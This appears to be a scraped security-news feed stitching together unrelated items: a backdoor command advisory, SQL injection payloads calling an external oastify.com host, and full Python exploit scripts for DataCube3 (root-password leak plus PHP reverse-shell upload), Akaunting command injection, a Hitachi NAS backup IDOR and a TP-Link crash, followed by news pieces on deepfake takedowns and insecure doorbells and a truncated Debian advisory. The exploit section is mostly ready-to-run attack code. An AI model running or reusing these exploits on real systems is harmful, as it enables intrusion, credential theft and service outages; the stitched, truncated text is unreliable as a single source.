Backdoor.Win32.Beastdoor.oq malware suffers from a remote command execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/6268df4c9c805c90725dde4fe5ef6fea.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Beastdoor.oqVulnerability: Unauthenticated Remote Command ExecutionDescription: The malware listens on TCP port 1332, makes outbound connections to SMTP port 25 and executes a PE file named svchost.exe dropped in Windows directory. Third party adversaries who can reach an infected host can issue various numeric commands made available by the backdoor.Family: BeastdoorType: PE32MD5: 6268df4c9c805c90725dde4fe5ef6feaVuln ID: MVID-2024-0674Dropped files: svchost.exeDisclosure: 03/09/2024Commands:27 return victims username and computer information5 or 19 will shutdown victims computer6 restart victims computer9 delete all files including program files16 victim computer screen goes black28 returns clipboard information30 terminates the backdoor and deletes it from the systemExploit/PoC:C:\sec>nc64.exe x.x.x.x 13322727VICTIM DESKTOP-2C3IQHO Windows 8.1 Intel(R) Core(TM) i7-7700HQ CPU @ 2.80GHzC:\WINDOWS\C:\WINDOWS\system32\1565 x 8302.01svchost.exe svchost.exe2828I dont like u30Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Beastdoor.oq MVID-2024-0674 Remote Command Execution

RUPPEINVOICE version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: RUPPEINVOICE-1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 03/09/2024## Vendor: https://www.mayurik.com/## Software: https://www.sourcecodester.com/php/14831/billing-system-project-php-source-code-free-download.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The username parameter appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\abpf13cdvni2r5g9hn26os0bd2jv7m0ardf52vqk.oastify.com\\fmd'))+'was submitted in the username parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed. The attacker can get all information from the system byusing this vulnerability!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: username (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: username=zBuveHif'+(selectload_file('\\\\abpf13cdvni2r5g9hn26os0bd2jv7m0ardf52vqk.oastify.com\\fmd'))+''OR NOT 6356=6356 AND 'Eocq'='Eocq&password=g7J!m3v!W2&login=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: username=zBuveHif'+(selectload_file('\\\\abpf13cdvni2r5g9hn26os0bd2jv7m0ardf52vqk.oastify.com\\fmd'))+''AND (SELECT 4013 FROM (SELECT(SLEEP(7)))BnHP) AND'bCQt'='bCQt&password=g7J!m3v!W2&login=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/RUPPEINVOICE-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/ruppeinvoice-10-multiple-sqli.html)## Time spend:00:35:00

RUPPEINVOICE 1.0 SQL Injection

DataCube3 version 1.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: DataCube3 v1.0 - Unrestricted file upload 'RCE'# Date: 7/28/2022# Exploit Author: Samy Younsi - NS Labs (https://neroteam.com)# Vendor Homepage: https://www.f-logic.jp# Software Link: https://www.f-logic.jp/pdf/support/manual_product/manual_product_datacube3_ver1.0_sc.pdf# Version: Ver1.0# Tested on: DataCube3 version 1.0 (Ubuntu)# CVE : CVE-2024-25830 + CVE-2024-25832# Exploit chain reverse shell, information disclosure (root password leak) + unrestricted file uploadfrom __future__ import print_function, unicode_literalsfrom bs4 import BeautifulSoupimport argparseimport requestsimport jsonimport urllib3import reurllib3.disable_warnings()def banner():  dataCube3Logo = """         ▒▒▒▒▒▒████████████████████████████████████▓▓▓▓▓▓▓▓      ▒▒▒▒▒▒▒▒██        DataCube3   Ver1.0      █F-logic▓▓      ▒▒████▒▒██        ████        ████        ██▓▓▓▓▓▓▓▓      ▒▒████▒▒██        ████        ████        ██▓▓▓▓▓▓▓▓      ▒▒▒▒▒▒▒▒██        ████        ████        ██▓▓▓▓▓▓▓▓      ▒▒▒▒▒▒▒▒██                                ██▓▓████▓▓      ▒▒▒▒▒▒▒▒██        ██             ██       ██▓▓████▓▓      ▒▒▒▒▒▒▒▒██        █████████████████       ██▓▓▓▓▓▓▓▓        ▒▒▒▒▒▒████████████████████████████████████▓▓▓▓▓▓                                                                                                                        \033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m         \033[1;91mDataCube3 exploit chain reverse shell\033[1;m                                                                 FOR EDUCATIONAL PURPOSE ONLY.     """  return print('\033[1;94m{}\033[1;m'.format(dataCube3Logo))def extractRootPwd(RHOST, RPORT, protocol):  url = '{}://{}:{}/admin/config_all.php'.format(protocol, RHOST, RPORT)  try:    response = requests.get(url, allow_redirects=False, verify=False, timeout=20)    if response.status_code != 302:      print('[!] \033[1;91mError: DataCube3 web interface is not reachable. Make sure the specified IP is correct.\033[1;m')      exit()    soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')    scriptTag = str(soup.find_all('script')[12]).replace(' ', '')    rawLeakedData = re.findall('configData:.*,', scriptTag)[0]    jsonLeakedData = json.loads('[{}]'.format(rawLeakedData.split('configData:[')[1].split('],')[0]))    adminPassword = jsonLeakedData[12]['value']    rootPassword = jsonLeakedData[14]['value']    print('[INFO] DataCube3 leaked credentials successfully extracted: admin:{} | root:{}.\n[INFO] The target must be vulnerable.'.format(adminPassword, rootPassword))    return rootPassword  except:    print('[ERROR] Can\'t grab the DataCube3 version...')def generateAuthCookie(RHOST, RPORT, protocol, rootPassword):  print('[INFO] Generating DataCube3 auth cookie ...')  url = '{}://{}:{}/admin/config_all.php'.format(protocol, RHOST, RPORT)  data = {    'user_id': 'root',    'user_pw': rootPassword,    'login': '%E3%83%AD%E3%82%B0%E3%82%A4%E3%83%B3'  }  try:    response = requests.post(url, data=data, allow_redirects=False, verify=False, timeout=20)    if response.status_code != 302:      print('[!] \033[1;91mError: An error occur while trying to get the auth cookie, is the root password correct?\033[1;m')      exit()    authCookie = response.cookies.get_dict()     print('[INFO] Authentication successful! Auth Cookie: {}'.format(authCookie))      return authCookie  except:    print('[ERROR] Can\'t grab the auth cookie, is the root password correct?')def extractAccesstime(RHOST, RPORT, LHOST, LPORT, protocol, authCookie):  print('[INFO] Extracting Accesstime ...')  url = '{}://{}:{}/admin/setting_photo.php'.format(protocol, RHOST, RPORT)  try:    response = requests.get(url, cookies=authCookie, allow_redirects=False, verify=False, timeout=20)    if response.status_code != 302:      print('[!] \033[1;91mError: An error occur while trying to get the accesstime value.\033[1;m')      exit()    soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')    accessTime = soup.find('input', {'name': 'accesstime'}).get('value')    print('[INFO] AccessTime value: {}'.format(accessTime))    return accessTime  except:    print('[ERROR] Can\'t grab the accesstime value, is the root password correct?')def injectReverseShell(RHOST, RPORT, LHOST, LPORT, protocol, authCookie, accessTime):  print('[INFO] Injecting PHP reverse shell script ...')  filename='rvs.php'  payload = '<?php $sock=fsockopen("{}",{});$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);?>'.format(LHOST, LPORT)  data = '-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="add"\r\n\r\nå��ç��è¿½å�\xA0\r\n-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="addPhoto"; filename="{}"\r\nContent-Type: image/jpeg\r\n\r\n{}\r\n-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="accesstime"\r\n\r\n{}\r\n-----------------------------113389720123090127612523184396--\r\n'.format(filename, payload, accessTime)  headers = {      'Content-Type': 'multipart/form-data; boundary=---------------------------113389720123090127612523184396'  }  url = '{}://{}:{}/admin/setting_photo.php'.format(protocol, RHOST, RPORT)  try:    response = requests.post(url, cookies=authCookie, headers=headers, data=data, allow_redirects=False, verify=False, timeout=20)    if response.status_code != 302:        print('[!] \033[1;91mError: An error occur while trying to upload the PHP reverse shell script.\033[1;m')        exit()    shellURL = '{}://{}:{}/images/slideshow/{}'.format(protocol, RHOST, RPORT, filename)    print('[INFO] PHP reverse shell script successfully uploaded!\n[INFO] SHELL URL: {}'.format(shellURL))    return shellURL  except:    print('[ERROR] Can\'t upload the PHP reverse shell script, is the root password correct?')def execReverseShell(shellURL):  print('[INFO] Executing reverse shell...')  try:    response = requests.get(shellURL, allow_redirects=False, verify=False)    print('[INFO] Reverse shell successfully executed.')    return  except Exception as e:      print('[ERROR] Reverse shell failed. Make sure the DataCube3 device can reach the host {}:{}')      return Falsedef main():  banner()  args = parser.parse_args()  protocol = 'https' if args.RPORT == 443 else 'http'  rootPassword = extractRootPwd(args.RHOST, args.RPORT, protocol)  authCookie = generateAuthCookie(args.RHOST, args.RPORT, protocol, rootPassword)  accessTime = extractAccesstime(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie)  shellURL = injectReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie, accessTime)  execReverseShell(shellURL)if __name__ == '__main__':  parser = argparse.ArgumentParser(description='Script PoC that exploit an unauthenticated remote command injection on f-logic DataCube3 devices.', add_help=False)  parser.add_argument('--RHOST', help='Refers to the IP of the target machine. (f-logic DataCube3 device)', type=str, required=True)  parser.add_argument('--RPORT', help='Refers to the open port of the target machine. (443 by default)', type=int, required=True)  parser.add_argument('--LHOST', help='Refers to the IP of your machine.', type=str, required=True)  parser.add_argument('--LPORT', help='Refers to the open port of your machine.', type=int, required=True)  main()

DataCube3 1.0 Shell Upload

Akaunting versions 3.1.3 and below suffer from a remote command execution vulnerability.

    # Exploit Title: Akaunting < 3.1.3 - RCE# Date: 08/02/2024# Exploit Author: u32i@proton.me# Vendor Homepage: https://akaunting.com# Software Link: https://github.com/akaunting/akaunting# Version: <= 3.1.3# Tested on: Ubuntu (22.04)# CVE : CVE-2024-22836#!/usr/bin/python3import sysimport reimport requestsimport argparsedef get_company():  # print("[INF] Retrieving company id...")  res = requests.get(target, headers=headers, cookies=cookies, allow_redirects=False)  if res.status_code != 302:    print("[ERR] No company id was found!")    sys.exit(3)  cid = res.headers['Location'].split('/')[-1]  if cid == "login":    print("[ERR] Invalid session cookie!")    sys.exit(7)  return ciddef get_tokens(url):  res = requests.get(url, headers=headers, cookies=cookies, allow_redirects=False)  search_res = re.search(r"\"csrfToken\"\:\".*\"", res.text)  if not search_res:    print("[ERR] Couldn't get csrf token")    sys.exit(1)  data = {}  data['csrf_token'] = search_res.group().split(':')[-1:][0].replace('"', '')  data['session'] = res.cookies.get('akaunting_session')  return datadef inject_command(cmd):  url = f"{target}/{company_id}/wizard/companies"  tokens = get_tokens(url)  headers.update({"X-Csrf-Token": tokens['csrf_token']})  data = {"_token": tokens['csrf_token'], "_method": "POST", "_prefix": "company", "locale": f"en_US && {cmd}"}  res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False)  if res.status_code == 200:    res_data = res.json()    if res_data['error']:      print("[ERR] Command injection failed!")      sys.exit(4)    print("[INF] Command injected!")def trigger_rce(app, version = "1.0.0"):  print("[INF] Executing the command...")  url = f"{target}/{company_id}/apps/install"  data = {"alias": app, "version": version, "path": f"apps/{app}/download"}  headers.update({"Content-Type":"application/json"})  res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False)  if res.status_code == 200:    res_data = res.json()    if res_data['error']:      search_res = re.search(r">Exit Code\:.*<", res_data['message'])      if search_res:        print("[ERR] Failed to execute the command")        sys.exit(6)      print("[ERR] Failed to install the app! no command was executed!")      sys.exit(5)    print("[INF] Executed successfully!")def login(email, password):  url = f"{target}/auth/login"  tokens = get_tokens(url)  cookies.update({    'akaunting_session': tokens['session']  })  data = {    "_token": tokens['csrf_token'],    "_method": "POST",    "email": email,    "password": password  }    req = requests.post(url, headers=headers, cookies=cookies, data=data)  res = req.json()  if res['error']:    print("[ERR] Failed to log in!")    sys.exit(8)  print("[INF] Logged in")  cookies.update({'akaunting_session': req.cookies.get('akaunting_session')})    def main():  inject_command(args.command)  trigger_rce(args.alias, args.version)if __name__=='__main__':  parser = argparse.ArgumentParser()  parser.add_argument("-u", "--url", help="target url")  parser.add_argument("--email", help="user login email.")  parser.add_argument("--password", help="user login password.")  parser.add_argument("-i", "--id", type=int, help="company id (optional).")  parser.add_argument("-c", "--command", help="command to execute.")  parser.add_argument("-a", "--alias", help="app alias, default: paypal-standard", default="paypal-standard")  parser.add_argument("-av", "--version", help="app version, default: 3.0.2", default="3.0.2")  args = parser.parse_args()    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"}  cookies = {}  target = args.url  try:    login(args.email, args.password)    company_id = get_company() if not args.id else args.id    main()  except:    sys.exit(0)

Akaunting 3.1.3 Remote Command Execution

Hitachi NAS SMU Backup and Restore versions prior to 14.8.7825.01 suffer from an insecure direct object reference vulnerability.

    #!/usr/bin/python3## Title:            Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore IDOR Vulnerability # CVE:              CVE-2023-5808# Date:             2023-12-13# Exploit Author:   Arslan Masood (@arszilla)# Vendor:           https://www.hitachivantara.com/# Version:          < 14.8.7825.01# Tested On:        13.9.7021.04        import argparsefrom datetime import datetimefrom os import getcwdimport requestsparser = argparse.ArgumentParser(    description="CVE-2023-5808 PoC",    usage="./CVE-2023-5808.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>"    )# Create --host argument:parser.add_argument(    "--host",    required=True,    type=str,    help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443"    )# Create --id argument:parser.add_argument(    "--id",    required=True,    type=str,    help="JSESSIONID cookie value"    )# Create --sso argument:parser.add_argument(    "--sso",    required=True,    type=str,    help="JSESSIONIDSSO cookie value"    )args = parser.parse_args()def download_file(hostname, jsessionid, jsessionidsso):    # Set the filename:    filename = f"smu_backup-{datetime.now().strftime('%Y-%m-%d_%H%M')}.zip"    # Vulnerable SMU URL:    smu_url = f"https://{hostname}/mgr/app/template/simple%2CBackupSmuScreen.vm/password/"    # GET request cookies    smu_cookies = {        "JSESSIONID":       jsessionid,        "JSESSIONIDSSO":    jsessionidsso        }    # GET request headers:    smu_headers = {        "User-Agent":                   "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",        "Accept":                       "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",        "Accept-Language":              "en-US,en;q=0.5",        "Accept-Encoding":              "gzip, deflate",        "Dnt":                          "1",        "Referer":                      f"https://{hostname}/mgr/app/action/admin.SmuBackupRestoreAction/eventsubmit_doperform/ignored",        "Upgrade-Insecure-Requests":    "1",        "Sec-Fetch-Dest":               "document",        "Sec-Fetch-Mode":               "navigate",        "Sec-Fetch-Site":               "same-origin",        "Sec-Fetch-User":               "?1",        "Te":                           "trailers",        "Connection":                   "close"        }    # Send the request:    with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download:        with open(filename, 'wb') as backup_archive:            # Write the zip file to the CWD:            backup_archive.write(file_download.content)    print(f"{filename} has been downloaded to {getcwd()}")if __name__ == "__main__":    download_file(args.host, args.id, args.sso)

Hitachi NAS SMU Backup And Restore Insecure Direct Object Reference

There exists a buffer overflow vulnerability in the TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request.

    # Exploit Title: TP-Link TL-WR740N - Buffer Overflow 'DOS'# Date: 8/12/2023# Exploit Author: Anish Feroz (ZEROXINN)# Vendor Homepage: http://www.tp-link.com# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n# Tested on: TP-Link TL-WR740N#Description:#There exist a buffer overflow vulnerability in TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request. To bring back the http (webserver), a user must physically reboot the router.#Usage:#python3 target username password#change port, if required------------------------------------------------POC-----------------------------------------#!/usr/bin/pythonimport requestsfrom requests.auth import HTTPBasicAuthimport base64def send_request(ip, username, password):    auth_url = f"http://{ip}:8082"    target_url = f"http://{ip}:8082/userRpm/PingIframeRpm.htm?ping_addr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&doType=ping&isNew=new&sendNum=4&pSize=64&overTime=800&trHops=20"    credentials = f"{username}:{password}"    encoded_credentials = base64.b64encode(credentials.encode()).decode()    headers = {        "Host": f"{ip}:8082",        "Authorization": f"Basic {encoded_credentials}",        "Upgrade-Insecure-Requests": "1",        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36",        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",        "Referer": f"http://{ip}:8082/userRpm/DiagnosticRpm.htm",        "Accept-Encoding": "gzip, deflate",        "Accept-Language": "en-US,en;q=0.9",        "Connection": "close"    }    session = requests.Session()        response = session.get(target_url, headers=headers)    if response.status_code == 200:        print("Server Crashed")        print(response.text)    else:        print(f"Script Completed with status code {response.status_code}")ip_address = input("Enter IP address of the host: ")username = input("Enter username: ")password = input("Enter password: ")send_request(ip_address, username, password)

TP-Link TL-WR740N Buffer Overflow / Denial Of Service

As the shift of IT infrastructure to cloud-based solutions celebrates its 10-year anniversary, it becomes clear that traditional on-premises approaches to data security are becoming obsolete. Rather than protecting the endpoint, DLP solutions need to refocus their efforts to where corporate data resides - in the browser.
A new guide by LayerX titled "On-Prem is Dead. Have You Adjusted Your Web

Data Leakage Prevention in the Age of Cloud Computing: A New Approach

Content creators are using copyright laws to get nonconsensual deepfakes removed from the web. With the complaints covering nearly 30,000 URLs, experts say Google should do more to help.

The number of nonconsensual deepfake porn videos online has exploded since 2017. As the harmful videos have spread, thousands of women—including Twitch streamers, gamers, and other content creators—have complained to Google about websites hosting the videos and tried to get the tech giant to remove them from its search results.

A WIRED analysis of copyright claims regarding websites that host deepfake porn videos reveals that thousands of takedown requests have been made, with the frequency of complaints increasing. More than 13,000 copyright complaints—encompassing almost 30,000 URLs—have been made to Google concerning content on a dozen of the most popular deepfake websites.

The complaints, which have been made under the Digital Media Copyright Act (DMCA), have resulted in thousands of nonconsensual videos being removed from the web. Two of the most prominent deepfake video websites have been the subject of more than 6,000 and 4,000 complaints each, data published by Google and Harvard University’s Lumen database shows. Across all the deepfake platforms analyzed, around 82 percent of complaints resulted in URLs being removed from Google, the company’s copyright transparency data shows.

Millions of people find and access deepfake video websites by searching for deepfakes, often alongside the names of celebrities or content creators. WIRED is not naming the specific websites to limit the exposure they receive. However, lawyers and companies combating deepfakes online, including by systematically making DMCA complaints, say the number of copyright complaints and high percentage of removals are a sign that Google should take more action against the specific websites. This should include removing them from search results entirely, they say.

“If the sole purpose of these websites is to abuse and manipulate a person’s personal brand, or take their autonomy away from them, or host simple revenge porn, they shouldn’t be there,” says Dan Purcell, the founder and CEO of Ceartas, a firm that helps creators remove their content when it is being used without permission.

For the biggest deepfake video website alone, Google has received takedown requests for 12,600 URLs, 88 percent of which have been taken offline. Purcell says that given the large volume of offending content, the tech company should be examining why the site is still in search results. “If you remove 12,000 links for infringement, why are they not just completely removed?” He adds: “They should not be crawled. They’re of no public interest.”

In the five years since nonconsensual deepfake porn videos first emerged, tech companies and lawmakers have been slow to act. At the same time, machine learning improvements have made it easier to create deepfakes. Today, there are a few kinds of explicit deepfake content: videos where a person’s face is put onto existing consensual pornography, apps that can “undress” a person or swap their face onto a nude image, and some generative AI that allows entirely new deepfake images to be created, such as the images of Taylor Swift which spread online in January.

Each method is weaponized—almost always against women—to degrade, harass, or cause shame, among other harms. Julie Inman Grant, Australia’s e-safety commissioner, says her office is starting to see more deepfakes reported to its image-based abuse complaints scheme, alongside other AI-generated content, such as “synthetic” child sexual abuse and children using apps to create sexualized videos of their classmates. “We know it’s a really underreported form of abuse,” Grant says.

As the number of videos on deepfake websites has grown, content creators—such as streamers and adult models—have used DMCA requests. The DMCA allows people who own the intellectual property of certain content to request it be removed from the websites directly or from search results. More than 8 billion takedown requests, covering everything from gaming to music, have been made to Google.

“The DMCA historically has been an important way for victims of image-based sexual abuse to get their content removed from the internet,” says Carrie Goldberg, a victims’ rights attorney. Goldberg says newer criminal laws and civil law procedures make it easier to get some image-based sexual abuse removed, but deepfakes complicate the situation. “While platforms tend to have no empathy for victims of privacy violations, they do respect copyright laws,” Goldberg says.

WIRED’s analysis of deepfake websites, which covered 14 sites, shows that Google has received DMCA takedown requests about all of them in the past few years. Many of the websites host only deepfake content and often focus on celebrities. The websites themselves include DMCA contact forms where people can directly request to have content removed, although they do not publish any statistics, and it is unclear how effective they are at responding to complaints. One website says it contains videos of “actresses, YouTubers, streamers, TV personas, and other types of public figures and celebrities.” It hosts hundreds of videos with “Taylor Swift” in the video title.

The vast majority of DMCA takedown requests linked to deepfake websites listed in Google’s data relate to two of the biggest sites. Neither responded to written questions sent by WIRED. The majority of the 14 websites had over 80 percent of the complaints leading to content being removed by Google. Some copyright takedown requests sent by individuals indicate the distress the videos can have. “It is done to demean and bully me,” one request says. “I take this very seriously and I will do anything and everything to get it taken down,” another says.

“It has such a huge impact on someone’s life,” says Yvette van Bekkum, the CEO of Orange Warriors, a firm that helps people remove leaked, stolen, or nonconsensually shared images online, including through DMCA requests. Van Bekkum says the organization is seeing an increase in deepfake content online, and victims face hurdles to come forward and ask that their content is removed. “Imagine going through a hiring process and people Google your name, and they find that kind of explicit content,” van Bekkum says.

Google spokesperson Ned Adriance says its DMCA process allows “rights holders” to protect their work online and the company has separate tools for dealing with deepfakes—including a separate form and removal process. “We have policies for nonconsensual deepfake pornography, so people can have this type of content that includes their likeness removed from search results,” Adriance says. “And we’re actively developing additional safeguards to help people who are affected.” Google says when it receives a high volume of valid copyright removals about a website, it uses those as a signal the site may not be providing high-quality content. The company also says it has created a system to remove duplicates of nonconsensual deepfake porn once it has removed one copy of it, and that it has recently updated its search results to limit the visibility for deepfakes when people aren't searching for them.

The DMCA is an imperfect tool, particularly when it comes to deepfakes. Goldberg says it needs someone to “affirm under penalty of perjury” that they’re the copyright holder of the video or images. “But the process of creating a deepfake can transform the image so much that the resulting image is not the same intellectual property as the images it was sourced from,” Goldberg says. Ultimately, this could mean the person creating the deepfake video may be the copyright holder of the abusive content. “Our firm has long advocated that the copyrighting of illegal works should revert to the victims so they can exercise control over them,” Goldberg says. “But the law has not yet caught up.”

Purcell, from Ceartas, says that the law is “not fit for purpose” and can be very “easily weaponized” by deepfake websites filing counternotices against DMCA requests. “At that point, the only option is to sue them,” Purcell says, which raises its own problems. The websites often don’t include contact details or information about who created them, and they can be based in countries with difficult legal regimes. “They will do anything to stay anonymous. They will hide themselves,” van Bekkum says. “They are using, on purpose, hosting companies offshore.”

Grant, the Australian regulator, says her office works with technology platforms and can also issue orders for content to be removed. The office has also targeted individuals who upload videos to deepfake websites. Last year, Grant’s office pursued a man who uploaded images of Australian public figures to one of the largest deepfake websites. He was ordered to remove the material and delete it from his devices.

“I am not a resident of Australia. The removal notice means nothing to me. Get an arrest warrant if you think you are right,” he emailed back after receiving the legal order, according to court documents. Months later, border officials told Grant that the man had entered Australia, and he was ultimately charged with contempt of court.

The incident was a rare example of a regulator or law enforcement body taking successful action against someone creating deepfakes. Adam Dodge, a lawyer and founder of Endtab (Ending Technology-Enabled Abuse), says technology companies should be funding greater education efforts in schools and communities about the harms of creating and sharing deepfakes, while legislators should put in place laws that don’t push the burden of getting content removed on the victims. “It needs to be considered as harmful, as devastating, and as important to internet safety as other forms of banned or criminal or regulated material that people find to be abhorrent and unacceptable,” Dodge says.

Google Is Getting Thousands of Deepfake Porn Complaints

By Deeba Ahmed
Major Retailers Selling Video Doorbells with Serious Security Flaws, Consumer Reports Warns.
This is a post from HackRead.com Read the original post: Unsecured Video Doorbells Sold on Major Platforms: Millions at Risk of Hacking

Consumer Reports exposes security vulnerabilities in popular video doorbells allowing unauthorized access, stolen footage, and privacy risks. Learn how to protect your home from insecure devices.

The video doorbell market has been flooded with a wide variety of brands, devices, versions, and sellers, making it difficult for buyers to find safe and reliable products. To make it more complicated, according to a report by Consumer Reports (CR), these devices lack basic access controls in network traffic enabling strangers to freely access private video thumbnails.

****Investigation****

As per CR’s investigation, significant security vulnerabilities were identified in video doorbells potentially allowing attackers to gain unauthorized access to video footage, control doorbell functions, or even steal personal information.

It all started when a CR journalist received an email with grainy images of herself waving at a doorbell camera, sent by CR privacy and security test engineer Steve Blair after hacking into the doorbell from 2,923 miles away.

Screenshot credit: Consumer Reports

Blair and fellow test engineer Della Rocca probed further and discovered security flaws in cheap, insecure electronics from Chinese manufacturers sold on online marketplaces like Amazon, Walmart, Sears, and Shein. 

The doorbells lacked a visible ID issued by the Federal Communications Commission (FCC), making them illegal to be distributed in the U.S. The researchers discovered security issues in video doorbells sold under Eken and Tuck brands, with at least 10 similar devices and all analyzed doorbells being controlled through an Eken-owned mobile app, Aiwit. Two products, sold under Fishbot and Rakeblue brands, showed similar vulnerabilities. 

Eken and Tuck are strong sellers, with multiple listings on Amazon generating over 4,200 sales in January 2024 alone. The doorbells are also available on Walmart.com, sears.com, and global marketplaces Shein and Temu under different names like Andoe, Gemee, and Luckwolf.

****Potential Dangers****

Anyone with physical access can hijack the doorbell without needing advanced tools or hacking skills. They only have to download the app and pair the device to their phone to view the camera’s video feed indefinitely.

Threat actors can control doorbells to monitor family members’ movements and expose their IP addresses and WiFi network names without encryption. Poor security on company servers storing videos may further increase threats. The Aiwit smartphone app can pair doorbells with WiFi hotspots, allowing people to access video feeds without passwords or accounts. Stalkers/adversaries can identify device serial numbers and access still images from the video feed even if the original owner regains device control.

Justin Brookman, director of technology policy for CR, suggests that e-commerce platforms, particularly big names like Amazon, should take responsibility for the harm caused by their products. Eken, Tuck, Amazon, Walmart, Sears, Shein, Temu, and the Federal Trade Commission have been notified about the issues by CR.

Temu has now removed all doorbells made by Eken and its app from its website and Walmart stated items not meeting safety, reliability, and compliance standards will be removed and blocked, but CR found “similar-looking” doorbells still available on these platforms. Amazon, Sears, and Shein are yet to respond.

****How to secure your doorbell camera?****

Although, 100% security is a myth, here are some steps you can take to make sure your doorbell is protected from hackers and spying by third parties:

****Choose a Reputable Brand:****

*   Avoid unbranded or cheap video doorbells, especially those from unfamiliar manufacturers.
*   Look for established security companies or well-known brands with a history of prioritizing security.

****Check for Security Features:****

*   Make sure your doorbell uses strong encryption for video transmission and storage.
*   Look for features like two-factor authentication (2FA) for logins and activity alerts.

****Secure Your Wi-Fi Network:****

*   Use a strong password for your Wi-Fi network and enable encryption (WPA2 or WPA3).
*   Consider creating a separate guest network for devices like your doorbell, keeping it isolated from your main network with sensitive data.

****Manage App Permissions:****

*   Only grant the doorbell app the minimum permissions necessary, like access to the camera and microphone.
*   Avoid apps from unknown developers and stick to official ones from the manufacturer.

****Keep Firmware Updated:****

*   Regularly update your doorbell’s firmware to ensure you have the latest security patches and bug fixes.
*   Enable automatic updates if available to stay protected.

****Monitor Activity:****

*   Be aware of who has access to your doorbell and monitor activity logs.
*   Look for any suspicious login attempts or unusual activity.

****Consider Privacy Settings:****

*   Adjust your doorbell’s privacy settings to control what areas are recorded and how long footage is stored.
*   Disable features you don’t need, like motion detection in public areas.

*   **FCC ID:** Look for a visible FCC ID on your doorbell. Devices without it might be illegal and lack proper security measures.
*   **Physical Security:** Make sure your doorbell is physically secure and can’t be easily tampered with.

1.  Vietnamese Group Hacks and Sells Bedroom Camera Footage
2.  Hacked Ring Cameras Used in Livestreaming Swatting Attacks
3.  3TB of clips from exposed home security cameras posted online
4.  Whitehat hacker: How to detect hidden cameras in Airbnb, hotels
5.  Wyze Cameras Glitch: 13K Users Saw Footage from Others’ Homes
6.  Israeli Rabbi Arrested for CCTV Hacking at Women’s Swimwear Store

Unsecured Video Doorbells Sold on Major Platforms: Millions at Risk of Hacking

Debian Linux Security Advisory 5637-1 - Several security vulnerabilities have been discovered in Squid, a full featured web proxy cache. Due to programming errors in Squid's HTTP request parsing, remote attackers may be able to execute a denial of service attack by sending large X-Forwarded-For header or trigger a stack buffer overflow while performing HTTP Digest authentication. Other issues facilitate request smuggling past a firewall or a denial of service against Squid's Helper process management.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5637-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
March 08, 2024                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : squid  
CVE ID         : CVE-2023-46724 CVE-2023-46846 CVE-2023-46847 CVE-2023-49285  
